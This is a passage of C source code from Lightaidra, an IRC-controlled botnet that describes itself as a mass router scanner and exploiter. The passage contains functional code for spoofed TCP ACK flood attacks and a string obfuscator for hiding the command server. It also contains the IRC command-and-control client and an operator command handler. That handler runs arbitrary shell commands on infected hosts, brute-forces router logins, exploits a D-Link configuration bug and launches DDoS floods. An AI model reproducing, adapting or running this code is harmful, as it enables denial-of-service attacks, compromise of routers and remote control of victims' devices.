dest = rand(); 259 | if (srchost == 0) saddr = get_spoofed(); 260 | else saddr = srchost; 261 | 262 | send_tcp.ip.tot_len = htons(40 + psize); 263 | send_tcp.ip.id = rand(); 264 | send_tcp.ip.check = 0; 265 | send_tcp.ip.saddr = saddr; 266 | send_tcp.ip.daddr = daddr; 267 | send_tcp.tcp.source = rand(); 268 | send_tcp.tcp.dest = dest; 269 | send_tcp.tcp.seq = rand(); 270 | send_tcp.tcp.ack_seq = rand(); 271 | send_tcp.tcp.check = 0; 272 | sin.sin_family = AF_INET; 273 | sin.sin_port = send_tcp.tcp.dest; 274 | sin.sin_addr.s_addr = send_tcp.ip.daddr; 275 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); 276 | check = in_cksum((unsigned short *)&send_tcp, 40); 277 | pseudo_header.source_address = send_tcp.ip.saddr; 278 | pseudo_header.dest_address = send_tcp.ip.daddr; 279 | pseudo_header.placeholder = 0; 280 | pseudo_header.protocol = IPPROTO_TCP; 281 | pseudo_header.tcp_length = htons(20 + psize); 282 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); 283 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); 284 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32 + psize); 285 | sendto(get, &send_tcp, 40 + psize, 0, (struct sockaddr *)&sin, sizeof(sin)); 286 | 287 | if (a >= 50) { 288 | if (time(NULL) >= start + secs) { 289 | sockwrite(sp->sockfd, "PRIVMSG %s :[ackflood] packeting completed!\n", channel); 290 | close(get); 291 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 292 | exit(EXIT_SUCCESS); 293 | } 294 | 295 | a = 0; 296 | } 297 | 298 | a++; 299 | } 300 | 301 | close(get); 302 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 303 | 304 | exit(EXIT_FAILURE); 305 | } 306 | 307 | void ngackflood(sock_t * sp, unsigned int dest_addr, unsigned short dest_port, int ntime) { 308 | int get; 309 | struct send_tcp send_tcp; 310 | struct pseudo_header pseudo_header; 311 | struct sockaddr_in sin; 312 | unsigned int syn[20] = { 2, 4, 5, 180, 4, 2, 8, 10, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 0 }, a = 0; 313 | unsigned int psize = 20, source, dest, check; 314 | unsigned long saddr, daddr, secs; 315 | time_t start = time(NULL); 316 | 317 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) 318 | exit(EXIT_FAILURE); { 319 | int i; 320 | 321 | for (i = 0; i < 20; i++) { 322 | send_tcp.buf[i] = (u_char) syn[i]; 323 | } 324 | } 325 | 326 | daddr = dest_addr; 327 | secs = ntime; 328 | dest = htons(dest_port); 329 | 330 | send_tcp.ip.ihl = 5; 331 | send_tcp.ip.version = 4; 332 | send_tcp.ip.tos = 16; 333 | send_tcp.ip.frag_off = 64; 334 | send_tcp.ip.ttl = 255; 335 | send_tcp.ip.protocol = 6; 336 | send_tcp.tcp.doff = 5; 337 | send_tcp.tcp.res1 = 0; 338 | send_tcp.tcp.cwr = 0; 339 | send_tcp.tcp.ece = 0; 340 | send_tcp.tcp.urg = 0; 341 | send_tcp.tcp.ack = 1; 342 | send_tcp.tcp.psh = 1; 343 | send_tcp.tcp.rst = 0; 344 | send_tcp.tcp.fin = 0; 345 | send_tcp.tcp.syn = 0; 346 | send_tcp.tcp.window = 30845; 347 | send_tcp.tcp.urg_ptr = 0; 348 | 349 | while (1) { 350 | if (dest_port == 0) dest = rand(); 351 | 352 | if (srchost == 0) saddr = get_spoofed(); 353 | else saddr = srchost; 354 | 355 | send_tcp.ip.tot_len = htons(40 + psize); 356 | send_tcp.ip.id = rand(); 357 | send_tcp.ip.check = 0; 358 | send_tcp.ip.saddr = saddr; 359 | send_tcp.ip.daddr = daddr; 360 | send_tcp.tcp.source = rand(); 361 | send_tcp.tcp.dest = dest; 362 | send_tcp.tcp.seq = rand(); 363 | send_tcp.tcp.ack_seq = rand(); 364 | send_tcp.tcp.check = 0; 365 | sin.sin_family = AF_INET; 366 | sin.sin_port = send_tcp.tcp.dest; 367 | sin.sin_addr.s_addr = send_tcp.ip.daddr; 368 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); 369 | check = in_cksum((unsigned short *)&send_tcp, 40); 370 | pseudo_header.source_address = send_tcp.ip.saddr; 371 | pseudo_header.dest_address = send_tcp.ip.daddr; 372 | pseudo_header.placeholder = 0; 373 | pseudo_header.protocol = IPPROTO_TCP; 374 | pseudo_header.tcp_length = htons(20 + psize); 375 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); 376 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); 377 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32 + psize); 378 | sendto(get, &send_tcp, 40 + psize, 0, (struct sockaddr *)&sin, sizeof(sin)); 379 | 380 | if (a >= 50) { 381 | if (time(NULL) >= start + secs) { 382 | sockwrite(sp->sockfd, "PRIVMSG %s :[ngackflood] packeting completed!\n", channel); 383 | close(get); 384 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 385 | exit(EXIT_SUCCESS); 386 | } 387 | 388 | a = 0; 389 | } 390 | 391 | a++; 392 | } 393 | 394 | close(get); 395 | sockwrite(sp->sockfd, "QUOTE ZOMBIE\n"); 396 | 397 | exit(EXIT_FAILURE); 398 | } 399 | -------------------------------------------------------------------------------- /source/hide.c: -------------------------------------------------------------------------------- 1 | /* 2 | * hide.c - USE LIGHTAIDRA AT YOUR OWN RISK! 3 | * 4 | * Lightaidra - IRC-based mass router scanner/exploiter. 5 | * Copyright (C) 2008-2015 Federico Fazzi, . 6 | * 7 | * LEGAL DISCLAIMER: It is the end user's responsibility to obey 8 | * all applicable local, state and federal laws. Developers assume 9 | * no liability and are not responsible for any misuse or damage 10 | * caused by this program. 11 | * 12 | * example: ./hide -encode "127.0.0.1:6667" 13 | * ./hide -decode ">@.CU,,,." <- copy into config.h 14 | * CHANGE THE POSITION OF ENCODES[] VALUES IF YOU WANT YOUR PRIVATE ENCODING. 15 | */ 16 | 17 | #include 18 | #include 19 | 20 | char encodes[] = { 21 | '<', '>', '@', '_', ';', ':', ',', '.', '-', '+', '*', '^', '?', '=', ')', '(', 22 | '|', 'A', 'B', '&', '%', '$', 'D', '"', '!', 'w', 'k', 'y', 'x', 'z', 'v', 'u', 23 | 't', 's', 'r', 'q', 'p', 'o', 'n', 'm', 'l', 'i', 'h', 'g', 'f', 'e', 'd', 'c', 24 | 'b', 'a', '~', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'F', 'U', 'C', 'K' 25 | }; 26 | 27 | char decodes[] = { 28 | '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 29 | 'g', 'h', 'i', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'z', 'y', 30 | 'w', 'k', 'x', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'L', 'M', 'N', 'O', 31 | 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'Z', 'Y', 'W', 'K', 'X', '|', ':', '.', ' ' 32 | }; 33 | 34 | char encoded[512], decoded[512]; 35 | 36 | void encode(char *str) { 37 | int x = 0, i = 0, c; 38 | 39 | memset(encoded, 0, sizeof(encoded)); 40 | while (x < strlen(str)) { 41 | for (c = 0; c <= sizeof(decodes); c++) { 42 | if (str[x] == decodes[c]) { 43 | encoded[i] = encodes[c]; 44 | i++; 45 | } 46 | } 47 | 48 | x++; 49 | } 50 | 51 | encoded[i] = '\0'; 52 | return; 53 | } 54 | 55 | void decode(char *str) { 56 | int x = 0, i = 0, c; 57 | 58 | memset(decoded, 0, sizeof(decoded)); 59 | 60 | while (x < strlen(str)) { 61 | for (c = 0; c <= sizeof(encodes); c++) { 62 | if (str[x] == encodes[c]) { 63 | decoded[i] = decodes[c]; 64 | i++; 65 | } 66 | } 67 | 68 | x++; 69 | } 70 | 71 | decoded[i] = '\0'; 72 | return; 73 | } 74 | 75 | int main(int argc, char *argv[]) { 76 | if (argv[1] == 0 || argv[2] == 0) { 77 | printf("./lighthide [-encode|-decode] [string]\n"); 78 | return(1); 79 | } 80 | else if (!strncmp(argv[1], "-encode", 7)) { 81 | encode(argv[2]); 82 | decode(encoded); 83 | printf("encoded[%s]:\n%s\n", decoded, encoded); 84 | } 85 | else if (!strncmp(argv[1], "-decode", 7)) { 86 | decode(argv[2]); 87 | encode(decoded); 88 | printf("decoded[%s]:\n%s\n", argv[2], decoded); 89 | } 90 | 91 | return(0); 92 | } 93 | -------------------------------------------------------------------------------- /source/irc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * irc.c - USE LIGHTAIDRA AT YOUR OWN RISK! 3 | * 4 | * Lightaidra - IRC-based mass router scanner/exploiter. 5 | * Copyright (C) 2008-2015 Federico Fazzi, . 6 | * 7 | * LEGAL DISCLAIMER: It is the end user's responsibility to obey 8 | * all applicable local, state and federal laws. Developers assume 9 | * no liability and are not responsible for any misuse or damage 10 | * caused by this program. 11 | * 12 | */ 13 | 14 | #include "../include/headers.h" 15 | 16 | char *getrstr(); 17 | int sockwrite(int sd, const char *fmt, ...); 18 | int irc_requests(sock_t * sp, requests_t * req); 19 | int pub_requests(sock_t * sp, requests_t * req); 20 | 21 | /* connect_to_irc(sock_t *) */ 22 | /* make an irc connection. */ 23 | int connect_to_irc(sock_t *sp) { 24 | int ps = 0, port = 0; 25 | requests_t *req; 26 | char *token, srv[32]; 27 | 28 | memset(srv, 0, sizeof srv); 29 | token = strtok(isrv[counter], ":"); 30 | while (token != NULL) { 31 | if (!ps) { 32 | strncpy(srv, token, sizeof(srv)-1); 33 | ps++; 34 | } 35 | else { 36 | port = atoi(token); 37 | } 38 | 39 | token = strtok(NULL, ":"); 40 | } 41 | 42 | sp->sockfd = false; 43 | if (!(sp->sockhs = gethostbyname(srv))) return EXIT_FAILURE; 44 | sp->sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 45 | 46 | sp->sockadr.sin_family = AF_INET; 47 | sp->sockadr.sin_port = htons(port); 48 | sp->sockadr.sin_addr = *((struct in_addr *)sp->sockhs->h_addr); 49 | 50 | memset(sp->sockadr.sin_zero, '\0', sizeof sp->sockadr.sin_zero); 51 | 52 | if (connect(sp->sockfd, (struct sockaddr *)&sp->sockadr, sizeof sp->sockadr) == false) 53 | return EXIT_FAILURE; 54 | 55 | getrstr(); 56 | snprintf(channel, sizeof(channel)-1, "%s", irc_chan); 57 | snprintf(nt, 3, "->%s", nctype); 58 | 59 | /* IRCD PASSWORD FOR MODDED SERVER/CLIENT WITH REPLACED PASS/local */ 60 | if (encirc != 0) { 61 | decode(enc_passwd, 1); 62 | if (sockwrite(sp->sockfd, "%s %s\n", passproto, decodedpsw)) 63 | return EXIT_FAILURE; 64 | } 65 | else { 66 | if (sockwrite(sp->sockfd, "%s %s\n", passproto, irc_passwd)) 67 | return EXIT_FAILURE; 68 | } 69 | 70 | if (sockwrite(sp->sockfd, "NICK %s\n", data_ptr)) 71 | return EXIT_FAILURE; 72 | 73 | if (sockwrite(sp->sockfd, "USER pwn localhost localhost :Lightaidra ;)\n")) 74 | return EXIT_FAILURE; 75 | 76 | req = (requests_t *) malloc(sizeof(requests_t)); 77 | 78 | if (irc_requests(sp, req)) { 79 | free(req); 80 | return EXIT_FAILURE; 81 | } 82 | 83 | return EXIT_SUCCESS; 84 | } 85 | 86 | /* irc_requests(sock_t *, requests_t *) */ 87 | /* manage the requests. */ 88 | int irc_requests(sock_t *sp, requests_t *req) { 89 | if (max_pids > 0) kill(g_pid, 9); 90 | 91 | stop = 0; 92 | max_pids = 0; 93 | login_status = false; 94 | srchost = 0; 95 | 96 | for (;;) { 97 | while ((pid = waitpid(-1, &pid_status, WNOHANG)) > 0) max_pids = 0; 98 | 99 | if (max_pids == 0 && stop == 0) { 100 | sleep(2); 101 | sockwrite(sp->sockfd, "TOPIC %s\n", channel); 102 | } 103 | 104 | /* stay alive in irc when operating started. */ 105 | /* to prevent the connection reset */ 106 | if (max_pids > 0) { 107 | sleep(4); 108 | cmd_ping(sp); 109 | } 110 | 111 | memset(netbuf, 0, sizeof netbuf); 112 | recv_bytes = recv(sp->sockfd, netbuf, sizebuf - 1, 0); 113 | 114 | if (recv_bytes == true) return EXIT_FAILURE; 115 | netbuf[recv_bytes] = 0; 116 | 117 | if (background_mode) { 118 | puts(netbuf); 119 | fflush(stdout); 120 | } 121 | 122 | if (pub_requests(sp, req)) return EXIT_FAILURE; 123 | } 124 | 125 | return EXIT_SUCCESS; 126 | } 127 | -------------------------------------------------------------------------------- /source/main.c: -------------------------------------------------------------------------------- 1 | /* 2 | * main.c - USE LIGHTAIDRA AT YOUR OWN RISK! 3 | * 4 | * Lightaidra - IRC-based mass router scanner/exploiter. 5 | * Copyright (C) 2008-2015 Federico Fazzi, . 6 | * 7 | * LEGAL DISCLAIMER: It is the end user's responsibility to obey 8 | * all applicable local, state and federal laws. Developers assume 9 | * no liability and are not responsible for any misuse or damage 10 | * caused by this program. 11 | * 12 | */ 13 | 14 | #include "../include/headers.h" 15 | 16 | void daemonize(); 17 | void create_irc_servlist(); 18 | int connect_to_irc(sock_t * sp); 19 | 20 | int main(int argc, char **argv) { 21 | sock_t *sp; 22 | 23 | if (!background_mode) daemonize(); 24 | 25 | pidprocess(); 26 | 27 | for (counter = 0; counter <= 10; counter++) isrv[counter] = (char *)malloc(32); 28 | 29 | counter = 0; 30 | create_irc_servlist(); 31 | 32 | retry: 33 | 34 | sleep(2); 35 | sp = (sock_t *) malloc(sizeof(sock_t)); 36 | 37 | if (connect_to_irc(sp)) { 38 | if (background_mode) printf("!Lightaidra: connection failed to %s!", isrv[counter]); 39 | 40 | if (counter <= total) counter++; 41 | else counter = 0; 42 | 43 | free(sp); 44 | goto retry; 45 | } 46 | 47 | return EXIT_SUCCESS; 48 | } 49 | -------------------------------------------------------------------------------- /source/requests.c: -------------------------------------------------------------------------------- 1 | /* 2 | * requests.c - USE LIGHTAIDRA AT YOUR OWN RISK! 3 | * 4 | * Lightaidra - IRC-based mass router scanner/exploiter. 5 | * Copyright (C) 2008-2015 Federico Fazzi, . 6 | * 7 | * LEGAL DISCLAIMER: It is the end user's responsibility to obey 8 | * all applicable local, state and federal laws. Developers assume 9 | * no liability and are not responsible for any misuse or damage 10 | * caused by this program. 11 | * 12 | */ 13 | 14 | #include "../include/headers.h" 15 | 16 | int cmd_init(sock_t *sp); 17 | int cmd_ping(sock_t *sp); 18 | void cmd_login(sock_t *sp, requests_t *req); 19 | void cmd_logout(sock_t *sp, requests_t *req); 20 | void cmd_exec(sock_t *sp, requests_t *req, char *token); 21 | void cmd_version(sock_t *sp); 22 | void cmd_status(sock_t *sp); 23 | void cmd_help(sock_t *sp); 24 | void cmd_setchan(sock_t *sp, requests_t *req); 25 | void cmd_stop(sock_t *sp); 26 | void cmd_join(sock_t *sp, requests_t *req); 27 | void cmd_part(sock_t *sp, requests_t *req); 28 | void cmd_quit(sock_t *sp, requests_t *req); 29 | int cmd_advscan_random(sock_t *sp, requests_t *req, int t); 30 | int cmd_advscan_recursive(sock_t *sp, requests_t *req); 31 | int cmd_advscan(sock_t *sp, requests_t *req); 32 | int login_control(requests_t *req); 33 | int twordcmp(const char *s, requests_t *req); 34 | int wordcmp(const char *s, requests_t *req); 35 | int wordcmpp(const char *s, requests_t *req); 36 | int sockwrite(int sd, const char *fmt, ...); 37 | int login(sock_t *sp, requests_t *req); 38 | int parse_input_errors(sock_t *sp, requests_t *req, 39 | unsigned short argn, unsigned short et); 40 | int getextip(sock_t *sp, requests_t *req); 41 | unsigned int host2ip(char *hostname); 42 | void cmd_spoof(sock_t *sp, requests_t *req); 43 | int packeting(sock_t *sp, unsigned int dest_addr, 44 | unsigned short dest_port, int ntime); 45 | void cmd_scan_central(sock_t *sp, requests_t *req, 46 | unsigned short type); 47 | 48 | int pub_requests(sock_t *sp, requests_t *req) { 49 | token = strtok(netbuf, "\n"); 50 | 51 | while (token != NULL) { 52 | memset(req->rcv_sb, 0, sizeof req->rcv_sb); 53 | memset(req->rcv_sc, 0, sizeof req->rcv_sc); 54 | memset(req->rcv_sd, 0, sizeof req->rcv_sd); 55 | memset(req->rcv_se, 0, sizeof req->rcv_se); 56 | 57 | sscanf(token, "%127s%31s%31s%31s%31s%31s%31s%31s", 58 | req->rcv_a, req->rcv_b, req->rcv_c, 59 | req->rcv_sa, req->rcv_sb, req->rcv_sc, req->rcv_sd, 60 | req->rcv_se); 61 | 62 | if (! strncmp(req->rcv_b, "433", strlen(req->rcv_b))) { 63 | getrstr(); 64 | if (sockwrite(sp->sockfd, "NICK %s\n", data_ptr)) return EXIT_FAILURE; 65 | } 66 | else if (! strncmp(req->rcv_b, "001", strlen(req->rcv_b))) { 67 | if (cmd_init(sp) == false) return EXIT_FAILURE; 68 | } 69 | else if (! strncmp(req->rcv_b, "332", strlen(req->rcv_b))) { 70 | if (max_pids == 0 && stop == 0) { 71 | if (!twordcmp(":.advscan->recursive", req)) { 72 | cmd_advscan_recursive(sp, req); 73 | } 74 | else if (!twordcmp(":.advscan->random->b", req)) { 75 | cmd_advscan_random(sp, req, 1); 76 | } 77 | else if (!twordcmp(":.advscan->random", req)) { 78 | cmd_advscan_random(sp, req, 0); 79 | } 80 | } 81 | } 82 | else if (! strncmp(req->rcv_a, "PING", strlen(req->rcv_a))) { 83 | cmd_ping(sp); 84 | } 85 | else if (! strncmp(req->rcv_b, "PRIVMSG", strlen(req->rcv_b))) { 86 | if (! wordcmp(":.login", req)) cmd_login(sp, req); 87 | 88 | if (login_control(req) == EXIT_SUCCESS && login_status == true) { 89 | if (! wordcmp(":.logout", req)) cmd_logout(sp, req); 90 | else if (! wordcmp(":.exec", req)) cmd_exec(sp, req, token); 91 | else if (! wordcmp(":.version", req)) cmd_version(sp); 92 | else if (! wordcmp(":.status", req)) cmd_status(sp); 93 | else if (! wordcmp(":.help", req)) cmd_help(sp); 94 | else if (! wordcmp(":.spoof", req)) cmd_spoof(sp, req); 95 | else if (! wordcmp(":.advscan->recursive", req)) { 96 | if (!max_pids) { 97 | stop = 0; 98 | cmd_advscan_recursive(sp, req); 99 | } 100 | else { 101 | if (all_messages) 102 | sockwrite(sp->sockfd, "PRIVMSG %s :[block] already working on %s\n", channel, status_temp); 103 | } 104 | } 105 | else if (! wordcmp(":.advscan->random->b", req)) { 106 | if (!max_pids) { 107 | stop = 0; 108 | cmd_advscan_random(sp, req, 1); 109 | } else { 110 | if (all_messages) 111 | sockwrite(sp->sockfd, "PRIVMSG %s :[block] already working on %s\n", channel, status_temp); 112 | } 113 | } 114 | else if (! wordcmp(":.advscan->random", req)) { 115 | if (!max_pids) { 116 | stop = 0; 117 | cmd_advscan_random(sp, req, 0); 118 | } 119 | else { 120 | if (all_messages) 121 | sockwrite(sp->sockfd, "PRIVMSG %s :[block] already working on %s\n", channel, status_temp); 122 | } 123 | } 124 | else if (! wordcmp(":.advscan", req)) { 125 | if (!max_pids) { 126 | stop = 0; 127 | cmd_advscan(sp, req); 128 | } 129 | else { 130 | if (all_messages) 131 | sockwrite(sp->sockfd, "PRIVMSG %s :[block] already working on %s\n", channel, status_temp); 132 | } 133 | } 134 | else if (! wordcmp(":.stop", req)) cmd_stop(sp); 135 | else if ( 136 | ! wordcmp(":.synflood", req) || 137 | ! wordcmp(":.ngsynflood", req) || 138 | ! wordcmp(":.ackflood", req) || 139 | ! wordcmp(":.ngackflood", req)) { 140 | if (!max_pids) { 141 | stop = 0; 142 | cmd_packeting(sp, req); 143 | } 144 | else { 145 | if (all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[block] already working on %s\n", channel, status_temp); 146 | } 147 | } 148 | else if ( 149 | ! wordcmpp(":.synflood->", req) || 150 | ! wordcmpp(":.ngsynflood->", req) || 151 | ! wordcmpp(":.ackflood->", req) || 152 | ! wordcmpp(":.ngackflood->", req)) { 153 | if (!max_pids) { 154 | if (strstr(req->rcv_sa, nctype)) { 155 | stop = 0; 156 | cmd_packeting(sp, req); 157 | } 158 | } 159 | else { 160 | if (all_messages) sockwrite(sp->sockfd, "PRIVMSG %s :[block] already working on %s\n", channel, status_temp); 161 | } 162 | } 163 | else if (! wordcmp(":.setchan", req)) cmd_setchan(sp, req); 164 | else if (! wordcmp(":.join", req)) cmd_join(sp, req); 165 | else if (! wordcmp(":.part", req)) cmd_part(sp, req); 166 | else if (! wordcmp(":.quit", req)) cmd_quit(sp, req); 167 | } 168 | } 169 | 170 | token = strtok(NULL, "\n"); 171 | } 172 | 173 | return EXIT_SUCCESS; 174 | } 175 | 176 | /* cmd_help(sock_t *) */ 177 | /* show help message. */ 178 | void cmd_help(sock_t *sp) { 179 | sockwrite(sp->sockfd, "PRIVMSG %s :* *** Access Commands:\n", channel); 180 | sockwrite(sp->sockfd, "PRIVMSG %s :*\n", channel); 181 | sockwrite(sp->sockfd, "PRIVMSG %s :* .login - login to bot's party-line\n", channel); 182 | sockwrite(sp->sockfd, "PRIVMSG %s :* .logout - logout from bot's party-line\n", channel); 183 | sockwrite(sp->sockfd, "PRIVMSG %s :*\n", channel); 184 | sockwrite(sp->sockfd, "PRIVMSG %s :* *** Miscs Commands\n", channel); 185 | sockwrite(sp->sockfd, "PRIVMSG %s :*\n", channel); 186 | sockwrite(sp->sockfd, "PRIVMSG %s :* .exec - execute a system command\n", channel); 187 | sockwrite(sp->sockfd, "PRIVMSG %s :* .version - show the current version of bot\n", channel); 188 | sockwrite(sp->sockfd, "PRIVMSG %s :* .status - show the status of bot\n", channel); 189 | sockwrite(sp->sockfd, "PRIVMSG %s :* .help - show this help message\n", channel); 190 | sockwrite(sp->sockfd, "PRIVMSG %s :*\n", channel); 191 | sockwrite(sp->sockfd, "PRIVMSG %s :* *** Scan Commands\n", channel); 192 | sockwrite(sp->sockfd, "PRIVMSG %s :*\n", channel); 193 | sockwrite(sp->sockfd, "PRIVMSG %s :* .advscan - scan with user:pass (A.B) classes sets by you\n", channel); 194 | sockwrite(sp->sockfd, "PRIVMSG %s :* .advscan - scan with d-link config reset bug\n", channel); 195 | sockwrite(sp->sockfd, "PRIVMSG %s :* .advscan->recursive - scan local ip range with user:pass, (C.D) classes random\n", channel); 196 | sockwrite(sp->sockfd, "PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug\n", channel); 197 | sockwrite(sp->sockfd, "PRIVMSG %s :* .advscan->random - scan random ip range with user:pass, (A.B) classes random\n", channel); 198 | sockwrite(sp->sockfd, "PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug\n", channel); 199 | sockwrite(sp->sockfd, "PRIVMSG %s :* .advscan->random->b - scan local ip range with user:pass, A.(B) class random\n", channel); 200 | sockwrite(sp->sockfd, "PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug\n", channel); 201 | sockwrite(sp->sockfd, "PRIVMSG %s :* .stop - stop current operation (scan/dos)\n", channel); 202 | sockwrite(sp->sockfd, "PRIVMSG %s :*\n", channel); 203 | sockwrite(sp->sockfd, "PRIVMSG %s :* *** DDos Commands:\n", channel); 204 | sockwrite(sp->sockfd, "PRIVMSG %s :* NOTE: to 0 = random ports, to 0 = random spoofing,\n", channel); 205 | sockwrite(sp->sockfd, "PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs\n", channel); 206 | sockwrite(sp->sockfd, "PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86\n", channel); 207 | sockwrite(sp->sockfd, "PRIVMSG %s :*\n", channel); 208 | sockwrite(sp->sockfd, "PRIVMSG %s :* .spoof - set the source address ip spoof\n", channel); 209 | sockwrite(sp->sockfd, "PRIVMSG %s :* .synflood - tcp syn flooder\n", channel); 210 | sockwrite(sp->sockfd, "PRIVMSG %s :* .ngsynflood - tcp ngsyn flooder (new generation)\n", channel); 211 | sockwrite(sp->sockfd, "PRIVMSG %s :* .ackflood - tcp ack flooder\n", channel); 212 | sockwrite(sp->sockfd, "PRIVMSG %s :* .ngackflood - tcp ngack flooder (new generation)\n", channel); 213 | sockwrite(sp->sockfd, "PRIVMSG %s :*\n", channel); 214 | sockwrite(sp->sockfd, "PRIVMSG %s :* *** IRC Commands:\n", channel); 215 | sockwrite(sp->sockfd, "PRIVMSG %s :*\n", channel); 216 | sockwrite(sp->sockfd, "PRIVMSG %s :* .setchan - set new master channel\n", channel); 217 | sockwrite(sp->sockfd, "PRIVMSG %s :* .join - join bot in selected room\n", channel); 218 | sockwrite(sp->sockfd, "PRIVMSG %s :* .part - part bot from selected room\n", channel); 219 | sockwrite(sp->sockfd, "PRIVMSG %s :* .quit - kill the current process\n", channel); 220 | sockwrite(sp->sockfd, "PRIVMSG %s :*\n", channel); 221 | sockwrite(sp->sockfd, "PRIVMSG %s :* *** EOF\n", channel); 222 | 223 | return; 224 | } 225 | 226 | void sigkill() { 227 | exit(EXIT_SUCCESS); 228 | } 229 | 230 | /* cmd_join(sock_t *) */ 231 | /* join channel after connect. */ 232 | int cmd_init(sock_t *sp) { 233 | if (sockwrite(sp->sockfd, "JOIN %s :%s\n", channel, irc_chankey)) 234 | return EXIT_FAILURE; 235 | 236 | return EXIT_SUCCESS; 237 | } 238 | 239 | /* cmd_ping(sock_t *) */ 240 | /* reply PING with PONG. */ 241 | int cmd_ping(sock_t *sp) { 242 | if (sockwrite(sp->sockfd, "PING 0313370\n")) 243 | return EXIT_FAILURE; 244 | 245 | return EXIT_SUCCESS; 246 | } 247 | 248 | /* cmd_login(sock_t *, requests_t *) */ 249 | /* log in the party-line bot. */ 250 | void cmd_login(sock_t *sp, requests_t * req) { 251 | if (login_status) { 252 | if (login(sp, req) == true) login_status = true; 253 | } 254 | 255 | return; 256 | } 257 | 258 | /* cmd_logout(sock_t *, requests_t *) */ 259 | /* log out from party-line bot. */ 260 | void cmd_logout(sock_t *sp, requests_t *req) { 261 | if (sockwrite(sp->sockfd, "PRIVMSG %s :[logout] you are logged out!, (%s).\n", channel, req->rcv_a + 1)) 262 | return; 263 | 264 | login_status = false; 265 | return; 266 | } 267 | 268 | /* cmd_exec(sock_t *, requests_t *, *) */ 269 | /* execute a system command. */ 270 | void cmd_exec(sock_t *sp, requests_t *req, char *token) { 271 | FILE *fd; 272 | char e_cmd[256], e_cmd_back[256]; 273 | unsigned short lens = 0; 274 | 275 | sscanf(token, "%*s%*s%*s%*s%255[^\n]", e_cmd); 276 | lens = strlen(e_cmd); 277 | 278 | if (lens < 3) { 279 | sockwrite(sp->sockfd, "PRIVMSG %s :[!exec] error on command: %s\n", 280 | channel, "(NULL)"); 281 | return; 282 | } 283 | 284 | e_cmd[lens - 1] = 0; 285 | fd = popen(e_cmd + 1, "r"); 286 | 287 | if (fd == NULL) { 288 | sockwrite(sp->sockfd, "PRIVMSG %s :[!exec] error on command: %s\n", 289 | channel, "(NULL)"); 290 | return; 291 | } 292 | 293 | sockwrite(sp->sockfd, "PRIVMSG %s :[exec] result of \"%s\":\n", 294 | channel, e_cmd + 1); 295 | 296 | while (fgets(e_cmd_back, sizeof(e_cmd_back) - 1, fd) != NULL) 297 | sockwrite(sp->sockfd, "PRIVMSG %s :%s\n", channel, e_cmd_back); 298 | 299 | pclose(fd); 300 | return; 301 | } 302 | 303 | /* cmd_version(sock_t *) */ 304 | /* show the current version of Aidra. */ 305 | void cmd_version(sock_t *sp) { 306 | sockwrite(sp->sockfd, "PRIVMSG %s :[version] lightaidra 0x2012.\n", channel); 307 | return; 308 | } 309 | 310 | /* cmd_status(sock_t * sp) */ 311 | /* show the current status */ 312 | void cmd_status(sock_t *sp) { 313 | if (!max_pids) sockwrite(sp->sockfd, "PRIVMSG %s :[status] currently not working.\n", channel); 314 | else sockwrite(sp->sockfd, "PRIVMSG %s :[status] working on %s\n", channel, status_temp); 315 | 316 | return; 317 | } 318 | 319 | /* cmd_spoof(sock_t *, requests_t *) */ 320 | /* set an address for ip spoofing */ 321 | void cmd_spoof(sock_t *sp, requests_t *req) { 322 | if (parse_input_errors(sp, req, 1, 0)) return; 323 | 324 | if (!strncmp(req->rcv_sb, "0", 1)) { 325 | srchost = 0; 326 | sockwrite(sp->sockfd, "PRIVMSG %s :[spoof] spoofing set as random ip!\n", channel); 327 | return; 328 | } 329 | 330 | if (strlen(req->rcv_sb) < 7 || strlen(req->rcv_sb) > 15) { 331 | sockwrite(sp->sockfd, "PRIVMSG %s :[error] one error in your input data, see help!\n", channel); 332 | return; 333 | } 334 | else { 335 | srchost = (unsigned int)host2ip(req->rcv_sb); 336 | sockwrite(sp->sockfd, "PRIVMSG %s :[spoof] spoofing set as ip: %s\n", channel, req->rcv_sb); 337 | return; 338 | } 339 | 340 | return; 341 | } 342 | 343 | /* cmd_advscan(sock_t *, requests_t *) */ 344 | /* start the advance scanner. */ 345 | int cmd_advscan(sock_t *sp, requests_t *req) { 346 | if (strlen(req->rcv_sb) < 1) return EXIT_FAILURE; 347 | 348 | /* check for input errors */ 349 | if (strlen(req->rcv_se)) { 350 | if (parse_input_errors(sp, req, 4, 1)) 351 | return EXIT_FAILURE; 352 | } 353 | else { 354 | if (parse_input_errors(sp, req, 2, 0)) return EXIT_FAILURE; 355 | else if (parse_input_errors(sp, req, 2, 1)) return EXIT_FAILURE; 356 | } 357 | 358 | if (strlen(req->rcv_sd) && strlen(req->rcv_se)) { 359 | snprintf(status_temp, sizeof(status_temp), "advscan scanning range %s.%s.0.0/16 (user:%s pass:%s)", 360 | req->rcv_sb, req->rcv_sc, req->rcv_sd, 